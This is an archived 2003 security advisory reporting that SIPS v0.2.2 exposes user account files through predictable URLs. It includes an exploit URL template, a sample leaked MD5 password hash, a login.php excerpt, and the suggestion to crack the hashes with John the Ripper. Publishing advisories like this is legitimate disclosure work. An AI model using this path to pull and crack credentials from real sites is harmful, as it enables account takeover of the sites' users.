('binary' encoding is not supported, stored as-is) Product : SIPS Version : v0.2.2 WebSite : http://www.squishdot.org Problem : Viewing users account Description: ------------ You could easily look throught any user's account without any permissions. Each of them is in dir names after first letter of his login. For example foo will have url like this one: /sipssys/users/f/foo/user So user's info file could be saw - it gaves u md5-hash of password, that you can try to crack by JtR or other any soft E.g: http://localhost/sips/sipssys/users/t/test/user Password::47bce5c74f589f4867dbd57e9ca9f808 //Пароль зашифрованный алгоритмом MD5. Email::test@localhost Theme::default ========== login.php: ========== [...] if ($action == "login") { if ($username) { if (file_exists($config["sipssys"] ."/users/$username[0]/ $username/user")) { $cryptpass = md5($password); if (getUserValue($username, "Password") == $cryptpass) { $cryptuser = "$username:$cryptpass"; [...] Exploit: -------- http://[somehost]/[sips_directioy]/sipssys/users/[first_letter_of_UserID]/ [UserID]/user Link: ===== www.dwcgr0up.com irc.dwcgr0up.biz:6667 Fixs: ===== U can finf all our fix on our homepage [www.dwcgroup.com] Thanks: ======= GipsHack crew : DHGroup etc etc
This archive was generated by hypermail 2b30 : Tue Mar 18 2003 - 16:27:33 PST